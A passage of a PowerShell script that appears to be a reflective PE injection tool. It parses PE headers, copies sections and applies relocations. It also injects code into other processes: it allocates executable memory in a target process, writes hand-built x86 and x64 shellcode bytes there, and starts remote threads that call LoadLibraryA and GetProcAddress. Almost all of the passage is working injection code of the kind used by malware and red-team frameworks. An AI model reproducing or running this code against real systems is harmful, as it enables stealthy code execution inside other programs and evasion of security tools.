NtHeadersInfo\n\t\t    $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $UnmanagedPEBytes -Win32Types $Win32Types\n\t\t\n\t\t    #Build a structure with the information which will be needed for allocating memory and writing the PE to memory\n\t\t    $PEInfo | Add-Member -MemberType NoteProperty -Name 'PE64Bit' -Value ($NtHeadersInfo.PE64Bit)\n\t\t    $PEInfo | Add-Member -MemberType NoteProperty -Name 'OriginalImageBase' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.ImageBase)\n\t\t    $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)\n\t\t    $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfHeaders' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfHeaders)\n\t\t    $PEInfo | Add-Member -MemberType NoteProperty -Name 'DllCharacteristics' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.DllCharacteristics)\n\t\t\n\t\t    #Free the memory allocated above, this isn't where we allocate the PE to memory\n\t\t    [System.Runtime.InteropServices.Marshal]::FreeHGlobal($UnmanagedPEBytes)\n\t\t\n\t\t    return $PEInfo\n\t    }\n\n\n\t    #PEInfo must contain the following NoteProperties:\n\t    #\tPEHandle: An IntPtr to the address the PE is loaded to in memory\n\t    Function Get-PEDetailedInfo\n\t    {\n\t\t    Param(\n\t\t    [Parameter( Position = 0, Mandatory = $true)]\n\t\t    [IntPtr]\n\t\t    $PEHandle,\n\t\t\n\t\t    [Parameter(Position = 1, Mandatory = $true)]\n\t\t    [System.Object]\n\t\t    $Win32Types,\n\t\t\n\t\t    [Parameter(Position = 2, Mandatory = $true)]\n\t\t    [System.Object]\n\t\t    $Win32Constants\n\t\t    )\n\t\t\n\t\t    if ($PEHandle -eq $null -or $PEHandle -eq [IntPtr]::Zero)\n\t\t    {\n\t\t\t    throw 'PEHandle is null or IntPtr.Zero'\n\t\t    }\n\t\t\n\t\t    $PEInfo = New-Object System.Object\n\t\t\n\t\t    #Get NtHeaders information\n\t\t    $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $PEHandle -Win32Types $Win32Types\n\t\t\n\t\t    #Build the PEInfo object\n\t\t    $PEInfo | Add-Member -MemberType NoteProperty -Name PEHandle -Value $PEHandle\n\t\t    $PEInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value ($NtHeadersInfo.IMAGE_NT_HEADERS)\n\t\t    $PEInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value ($NtHeadersInfo.NtHeadersPtr)\n\t\t    $PEInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value ($NtHeadersInfo.PE64Bit)\n\t\t    $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)\n\t\t\n\t\t    if ($PEInfo.PE64Bit -eq $true)\n\t\t    {\n\t\t\t    [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS64)))\n\t\t\t    $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr\n\t\t    }\n\t\t    else\n\t\t    {\n\t\t\t    [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS32)))\n\t\t\t    $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr\n\t\t    }\n\t\t\n\t\t    if (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_DLL) -eq $Win32Constants.IMAGE_FILE_DLL)\n\t\t    {\n\t\t\t    $PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'DLL'\n\t\t    }\n\t\t    elseif (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE) -eq $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE)\n\t\t    {\n\t\t\t    $PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'EXE'\n\t\t    }\n\t\t    else\n\t\t    {\n\t\t\t    Throw \"PE file is not an EXE or DLL\"\n\t\t    }\n\t\t\n\t\t    return $PEInfo\n\t    }\n\t\n\t\n\t    Function Import-DllInRemoteProcess\n\t    {\n\t\t    Param(\n\t\t    [Parameter(Position=0, Mandatory=$true)]\n\t\t    [IntPtr]\n\t\t    $RemoteProcHandle,\n\t\t\n\t\t    [Parameter(Position=1, Mandatory=$true)]\n\t\t    [IntPtr]\n\t\t    $ImportDllPathPtr\n\t\t    )\n\t\t\n\t\t    $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])\n\t\t\n\t\t    $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr)\n\t\t    $DllPathSize = [UIntPtr][UInt64]([UInt64]$ImportDllPath.Length + 1)\n\t\t    $RImportDllPathPtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n\t\t    if ($RImportDllPathPtr -eq [IntPtr]::Zero)\n\t\t    {\n\t\t\t    Throw \"Unable to allocate memory in the remote process\"\n\t\t    }\n\n\t\t    [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero\n\t\t    $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RImportDllPathPtr, $ImportDllPathPtr, $DllPathSize, [Ref]$NumBytesWritten)\n\t\t\n\t\t    if ($Success -eq $false)\n\t\t    {\n\t\t\t    Throw \"Unable to write DLL path to remote process memory\"\n\t\t    }\n\t\t    if ($DllPathSize -ne $NumBytesWritten)\n\t\t    {\n\t\t\t    Throw \"Didn't write the expected amount of bytes when writing a DLL path to load to the remote process\"\n\t\t    }\n\t\t\n\t\t    $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke(\"kernel32.dll\")\n\t\t    $LoadLibraryAAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, \"LoadLibraryA\") #Kernel32 loaded to the same address for all processes\n\t\t\n\t\t    [IntPtr]$DllAddress = [IntPtr]::Zero\n\t\t    #For 64bit DLL's, we can't use just CreateRemoteThread to call LoadLibrary because GetExitCodeThread will only give back a 32bit value, but we need a 64bit address\n\t\t    #\tInstead, write shellcode while calls LoadLibrary and writes the result to a memory address we specify. Then read from that memory once the thread finishes.\n\t\t    if ($PEInfo.PE64Bit -eq $true)\n\t\t    {\n\t\t\t    #Allocate memory for the address returned by LoadLibraryA\n\t\t\t    $LoadLibraryARetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n\t\t\t    if ($LoadLibraryARetMem -eq [IntPtr]::Zero)\n\t\t\t    {\n\t\t\t\t    Throw \"Unable to allocate memory in the remote process for the return value of LoadLibraryA\"\n\t\t\t    }\n\t\t\t\n\t\t\t\n\t\t\t    #Write Shellcode to the remote process which will call LoadLibraryA (Shellcode: LoadLibraryA.asm)\n\t\t\t    $LoadLibrarySC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)\n\t\t\t    $LoadLibrarySC2 = @(0x48, 0xba)\n\t\t\t    $LoadLibrarySC3 = @(0xff, 0xd2, 0x48, 0xba)\n\t\t\t    $LoadLibrarySC4 = @(0x48, 0x89, 0x02, 0x48, 0x89, 0xdc, 0x5b, 0xc3)\n\t\t\t\n\t\t\t    $SCLength = $LoadLibrarySC1.Length + $LoadLibrarySC2.Length + $LoadLibrarySC3.Length + $LoadLibrarySC4.Length + ($PtrSize * 3)\n\t\t\t    $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)\n\t\t\t    $SCPSMemOriginal = $SCPSMem\n\t\t\t\n\t\t\t    Write-BytesToMemory -Bytes $LoadLibrarySC1 -MemoryAddress $SCPSMem\n\t\t\t    $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC1.Length)\n\t\t\t    [System.Runtime.InteropServices.Marshal]::StructureToPtr($RImportDllPathPtr, $SCPSMem, $false)\n\t\t\t    $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\t\t    Write-BytesToMemory -Bytes $LoadLibrarySC2 -MemoryAddress $SCPSMem\n\t\t\t    $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC2.Length)\n\t\t\t    [System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryAAddr, $SCPSMem, $false)\n\t\t\t    $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\t\t    Write-BytesToMemory -Bytes $LoadLibrarySC3 -MemoryAddress $SCPSMem\n\t\t\t    $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC3.Length)\n\t\t\t    [System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryARetMem, $SCPSMem, $false)\n\t\t\t    $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\t\t    Write-BytesToMemory -Bytes $LoadLibrarySC4 -MemoryAddress $SCPSMem\n\t\t\t    $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC4.Length)\n\n\t\t\t\n\t\t\t    $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)\n\t\t\t    if ($RSCAddr -eq [IntPtr]::Zero)\n\t\t\t    {\n\t\t\t\t    Throw \"Unable to allocate memory in the remote process for shellcode\"\n\t\t\t    }\n\t\t\t\n\t\t\t    $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)\n\t\t\t    if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))\n\t\t\t    {\n\t\t\t\t    Throw \"Unable to write shellcode to remote process memory.\"\n\t\t\t    }\n\t\t\t\n\t\t\t    $RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions\n\t\t\t    $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)\n\t\t\t    if ($Result -ne 0)\n\t\t\t    {\n\t\t\t\t    Throw \"Call to CreateRemoteThread to call GetProcAddress failed.\"\n\t\t\t    }\n\t\t\t\n\t\t\t    #The shellcode writes the DLL address to memory in the remote process at address $LoadLibraryARetMem, read this memory\n\t\t\t    [IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)\n\t\t\t    $Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $LoadLibraryARetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten)\n\t\t\t    if ($Result -eq $false)\n\t\t\t    {\n\t\t\t\t    Throw \"Call to ReadProcessMemory failed\"\n\t\t\t    }\n\t\t\t    [IntPtr]$DllAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])\n\n\t\t\t    $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $LoadLibraryARetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\t\t\t    $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\t\t    }\n\t\t    else\n\t\t    {\n\t\t\t    [IntPtr]$RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $LoadLibraryAAddr -ArgumentPtr $RImportDllPathPtr -Win32Functions $Win32Functions\n\t\t\t    $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)\n\t\t\t    if ($Result -ne 0)\n\t\t\t    {\n\t\t\t\t    Throw \"Call to CreateRemoteThread to call GetProcAddress failed.\"\n\t\t\t    }\n\t\t\t\n\t\t\t    [Int32]$ExitCode = 0\n\t\t\t    $Result = $Win32Functions.GetExitCodeThread.Invoke($RThreadHandle, [Ref]$ExitCode)\n\t\t\t    if (($Result -eq 0) -or ($ExitCode -eq 0))\n\t\t\t    {\n\t\t\t\t    Throw \"Call to GetExitCodeThread failed\"\n\t\t\t    }\n\t\t\t\n\t\t\t    [IntPtr]$DllAddress = [IntPtr]$ExitCode\n\t\t    }\n\t\t\n\t\t    $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RImportDllPathPtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\t\t\n\t\t    return $DllAddress\n\t    }\n\t\n\t\n\t    Function Get-RemoteProcAddress\n\t    {\n\t\t    Param(\n\t\t    [Parameter(Position=0, Mandatory=$true)]\n\t\t    [IntPtr]\n\t\t    $RemoteProcHandle,\n\t\t\n\t\t    [Parameter(Position=1, Mandatory=$true)]\n\t\t    [IntPtr]\n\t\t    $RemoteDllHandle,\n\t\t\n\t\t    [Parameter(Position=2, Mandatory=$true)]\n\t\t    [String]\n\t\t    $FunctionName\n\t\t    )\n\n\t\t    $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])\n\t\t    $FunctionNamePtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($FunctionName)\n\t\t\n\t\t    #Write FunctionName to memory (will be used in GetProcAddress)\n\t\t    $FunctionNameSize = [UIntPtr][UInt64]([UInt64]$FunctionName.Length + 1)\n\t\t    $RFuncNamePtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $FunctionNameSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n\t\t    if ($RFuncNamePtr -eq [IntPtr]::Zero)\n\t\t    {\n\t\t\t    Throw \"Unable to allocate memory in the remote process\"\n\t\t    }\n\n\t\t    [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero\n\t\t    $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RFuncNamePtr, $FunctionNamePtr, $FunctionNameSize, [Ref]$NumBytesWritten)\n\t\t    [System.Runtime.InteropServices.Marshal]::FreeHGlobal($FunctionNamePtr)\n\t\t    if ($Success -eq $false)\n\t\t    {\n\t\t\t    Throw \"Unable to write DLL path to remote process memory\"\n\t\t    }\n\t\t    if ($FunctionNameSize -ne $NumBytesWritten)\n\t\t    {\n\t\t\t    Throw \"Didn't write the expected amount of bytes when writing a DLL path to load to the remote process\"\n\t\t    }\n\t\t\n\t\t    #Get address of GetProcAddress\n\t\t    $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke(\"kernel32.dll\")\n\t\t    $GetProcAddressAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, \"GetProcAddress\") #Kernel32 loaded to the same address for all processes\n\n\t\t\n\t\t    #Allocate memory for the address returned by GetProcAddress\n\t\t    $GetProcAddressRetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UInt64][UInt64]$PtrSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n\t\t    if ($GetProcAddressRetMem -eq [IntPtr]::Zero)\n\t\t    {\n\t\t\t    Throw \"Unable to allocate memory in the remote process for the return value of GetProcAddress\"\n\t\t    }\n\t\t\n\t\t\n\t\t    #Write Shellcode to the remote process which will call GetProcAddress\n\t\t    #Shellcode: GetProcAddress.asm\n\t\t    #todo: need to have detection for when to get by ordinal\n\t\t    [Byte[]]$GetProcAddressSC = @()\n\t\t    if ($PEInfo.PE64Bit -eq $true)\n\t\t    {\n\t\t\t    $GetProcAddressSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)\n\t\t\t    $GetProcAddressSC2 = @(0x48, 0xba)\n\t\t\t    $GetProcAddressSC3 = @(0x48, 0xb8)\n\t\t\t    $GetProcAddressSC4 = @(0xff, 0xd0, 0x48, 0xb9)\n\t\t\t    $GetProcAddressSC5 = @(0x48, 0x89, 0x01, 0x48, 0x89, 0xdc, 0x5b, 0xc3)\n\t\t    }\n\t\t    else\n\t\t    {\n\t\t\t    $GetProcAddressSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xc0, 0xb8)\n\t\t\t    $GetProcAddressSC2 = @(0xb9)\n\t\t\t    $GetProcAddressSC3 = @(0x51, 0x50, 0xb8)\n\t\t\t    $GetProcAddressSC4 = @(0xff, 0xd0, 0xb9)\n\t\t\t    $GetProcAddressSC5 = @(0x89, 0x01, 0x89, 0xdc, 0x5b, 0xc3)\n\t\t    }\n\t\t    $SCLength = $GetProcAddressSC1.Length + $GetProcAddressSC2.Length + $GetProcAddressSC3.Length + $GetProcAddressSC4.Length + $GetProcAddressSC5.Length + ($PtrSize * 4)\n\t\t    $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)\n\t\t    $SCPSMemOriginal = $SCPSMem\n\t\t\n\t\t    Write-BytesToMemory -Bytes $GetProcAddressSC1 -MemoryAddress $SCPSMem\n\t\t    $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC1.Length)\n\t\t    [System.Runtime.InteropServices.Marshal]::StructureToPtr($RemoteDllHandle, $SCPSMem, $false)\n\t\t    $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\t    Write-BytesToMemory -Bytes $GetProcAddressSC2 -MemoryAddress $SCPSMem\n\t\t    $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC2.Length)\n\t\t    [System.Runtime.InteropServices.Marshal]::StructureToPtr($RFuncNamePtr, $SCPSMem, $false)\n\t\t    $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\t    Write-BytesToMemory -Bytes $GetProcAddressSC3 -MemoryAddress $SCPSMem\n\t\t    $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC3.Length)\n\t\t    [System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressAddr, $SCPSMem, $false)\n\t\t    $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\t    Write-BytesToMemory -Bytes $GetProcAddressSC4 -MemoryAddress $SCPSMem\n\t\t    $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC4.Length)\n\t\t    [System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressRetMem, $SCPSMem, $false)\n\t\t    $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\t    Write-BytesToMemory -Bytes $GetProcAddressSC5 -MemoryAddress $SCPSMem\n\t\t    $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC5.Length)\n\t\t\n\t\t    $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)\n\t\t    if ($RSCAddr -eq [IntPtr]::Zero)\n\t\t    {\n\t\t\t    Throw \"Unable to allocate memory in the remote process for shellcode\"\n\t\t    }\n\t\t\n\t\t    $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)\n\t\t    if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))\n\t\t    {\n\t\t\t    Throw \"Unable to write shellcode to remote process memory.\"\n\t\t    }\n\t\t\n\t\t    $RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions\n\t\t    $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)\n\t\t    if ($Result -ne 0)\n\t\t    {\n\t\t\t    Throw \"Call to CreateRemoteThread to call GetProcAddress failed.\"\n\t\t    }\n\t\t\n\t\t    #The process address is written to memory in the remote process at address $GetProcAddressRetMem, read this memory\n\t\t    [IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)\n\t\t    $Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $GetProcAddressRetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten)\n\t\t    if (($Result -eq $false) -or ($NumBytesWritten -eq 0))\n\t\t    {\n\t\t\t    Throw \"Call to ReadProcessMemory failed\"\n\t\t    }\n\t\t    [IntPtr]$ProcAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])\n\n\t\t    $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\t\t    $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RFuncNamePtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\t\t    $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $GetProcAddressRetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\t\t\n\t\t    return $ProcAddress\n\t    }\n\n\n\t    Function Copy-Sections\n\t    {\n\t\t    Param(\n\t\t    [Parameter(Position = 0, Mandatory = $true)]\n\t\t    [Byte[]]\n\t\t    $PEBytes,\n\t\t\n\t\t    [Parameter(Position = 1, Mandatory = $true)]\n\t\t    [System.Object]\n\t\t    $PEInfo,\n\t\t\n\t\t    [Parameter(Position = 2, Mandatory = $true)]\n\t\t    [System.Object]\n\t\t    $Win32Functions,\n\t\t\n\t\t    [Parameter(Position = 3, Mandatory = $true)]\n\t\t    [System.Object]\n\t\t    $Win32Types\n\t\t    )\n\t\t\n\t\t    for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++)\n\t\t    {\n\t\t\t    [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))\n\t\t\t    $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER)\n\t\t\n\t\t\t    #Address to copy the section to\n\t\t\t    [IntPtr]$SectionDestAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$SectionHeader.VirtualAddress))\n\t\t\t\n\t\t\t    #SizeOfRawData is the size of the data on disk, VirtualSize is the minimum space that can be allocated\n\t\t\t    #    in memory for the section. If VirtualSize > SizeOfRawData, pad the extra spaces with 0. If\n\t\t\t    #    SizeOfRawData > VirtualSize, it is because the section stored on disk has padding that we can throw away,\n\t\t\t    #    so truncate SizeOfRawData to VirtualSize\n\t\t\t    $SizeOfRawData = $SectionHeader.SizeOfRawData\n\n\t\t\t    if ($SectionHeader.PointerToRawData -eq 0)\n\t\t\t    {\n\t\t\t\t    $SizeOfRawData = 0\n\t\t\t    }\n\t\t\t\n\t\t\t    if ($SizeOfRawData -gt $SectionHeader.VirtualSize)\n\t\t\t    {\n\t\t\t\t    $SizeOfRawData = $SectionHeader.VirtualSize\n\t\t\t    }\n\t\t\t\n\t\t\t    if ($SizeOfRawData -gt 0)\n\t\t\t    {\n\t\t\t\t    Test-MemoryRangeValid -DebugString \"Copy-Sections::MarshalCopy\" -PEInfo $PEInfo -StartAddress $SectionDestAddr -Size $SizeOfRawData | Out-Null\n\t\t\t\t    [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, [Int32]$SectionHeader.PointerToRawData, $SectionDestAddr, $SizeOfRawData)\n\t\t\t    }\n\t\t\n\t\t\t    #If SizeOfRawData is less than VirtualSize, set memory to 0 for the extra space\n\t\t\t    if ($SectionHeader.SizeOfRawData -lt $SectionHeader.VirtualSize)\n\t\t\t    {\n\t\t\t\t    $Difference = $SectionHeader.VirtualSize - $SizeOfRawData\n\t\t\t\t    [IntPtr]$StartAddress = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$SectionDestAddr) ([Int64]$SizeOfRawData))\n\t\t\t\t    Test-MemoryRangeValid -DebugString \"Copy-Sections::Memset\" -PEInfo $PEInfo -StartAddress $StartAddress -Size $Difference | Out-Null\n\t\t\t\t    $Win32Functions.memset.Invoke($StartAddress, 0, [IntPtr]$Difference) | Out-Null\n\t\t\t    }\n\t\t    }\n\t    }\n\n\n\t    Function Update-MemoryAddresses\n\t    {\n\t\t    Param(\n\t\t    [Parameter(Position = 0, Mandatory = $true)]\n\t\t    [System.Object]\n\t\t    $PEInfo,\n\t\t\n\t\t    [Parameter(Position = 1, Mandatory = $true)]\n\t\t    [Int64]\n\t\t    $OriginalImageBase,\n\t\t\n\t\t    [Parameter(Position = 2, Mandatory = $true)]\n\t\t    [System.Object]\n\t\t    $Win32Constants,\n\t\t\n\t\t    [Parameter(Position = 3, Mandatory = $true)]\n\t\t    [System.Object]\n\t\t    $Win32Types\n\t\t    )\n\t\t\n\t\t    [Int64]$BaseDifference = 0\n\t\t    $AddDifference = $true #Track if the difference variable should be added or subtracted from variables\n\t\t    [UInt32]$ImageBaseRelocSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_BASE_RELOCATION)\n\t\t\n\t\t    #If the PE was loaded to its expected address or there are no entries in the BaseRelocationTable, nothing to do\n\t\t    if (($OriginalImageBase -eq [Int64]$PEInfo.EffectivePEHandle) `\n\t\t\t\t    -or ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.Size -eq 0))\n\t\t    {\n\t\t\t    return\n\t\t    }\n\n\n\t\t    elseif ((Compare-Val1GreaterThanVal2AsUInt ($OriginalImageBase) ($PEInfo.EffectivePEHandle)) -eq $true)\n\t\t    {\n\t\t\t    $BaseDifference = Sub-SignedIntAsUnsigned ($OriginalImageBase) ($PEInfo.EffectivePEHandle)\n\t\t\t    $AddDifference = $false\n\t\t    }\n\t\t    elseif ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.EffectivePEHandle) ($OriginalImageBase)) -eq $true)\n\t\t    {\n\t\t\t    $BaseDifference = Sub-SignedIntAsUnsigned ($PEInfo.EffectivePEHandle) ($OriginalImageBase)\n\t\t    }\n\t\t\n\t\t    #Use the IMAGE_BASE_RELOCATION structure to find memory addresses which need to be modified\n\t\t    [IntPtr]$BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.VirtualAddress))\n\t\t    while($true)\n\t\t    {\n\t\t\t    #If SizeOfBlock == 0, we are done\n\t\t\t    $BaseRelocationTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($BaseRelocPtr, [Type]$Win32Types.IMAGE_BASE_RELOCATION)\n\n\t\t\t    if ($BaseRelocationTable.SizeOfBlock -eq 0)\n\t\t\t    {\n\t\t\t\t    break\n\t\t\t    }\n\n\t\t\t    [IntPtr]$MemAddrBase = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$BaseRelocationTable.VirtualAddress))\n\t\t\t    $NumRelocations = ($BaseRelocationTable.SizeOfBlock - $ImageBaseRelocSize) / 2\n\n\t\t\t    #Loop through each relocation\n\t\t\t    for($i = 0; $i -lt $NumRelocations; $i++)\n\t\t\t    {\n\t\t\t\t    #Get info for this relocation\n\t\t\t\t    $RelocationInfoPtr = [IntPtr](Add-SignedIntAsUnsigned ([IntPtr]$BaseRelocPtr) ([Int64]$ImageBaseRelocSize + (2 * $i)))\n\t\t\t\t    [UInt16]$RelocationInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($RelocationInfoPtr, [Type][UInt16])\n\n\t\t\t\t    #First 4 bits is the relocation type, last 12 bits is the address offset from $MemAddrBase\n\t\t\t\t    [UInt16]$RelocOffset = $RelocationInfo -band 0x0FFF\n\t\t\t\t    [UInt16]$RelocType = $RelocationInfo -band 0xF000\n\t\t\t\t    for ($j = 0; $j -lt 12; $j++)\n\t\t\t\t    {\n\t\t\t\t\t    $RelocType = [Math]::Floor($RelocType / 2)\n\t\t\t\t    }\n\n\t\t\t\t    #For DLL's there are two types of relocations used according to the following MSDN article. One for 64bit and one for 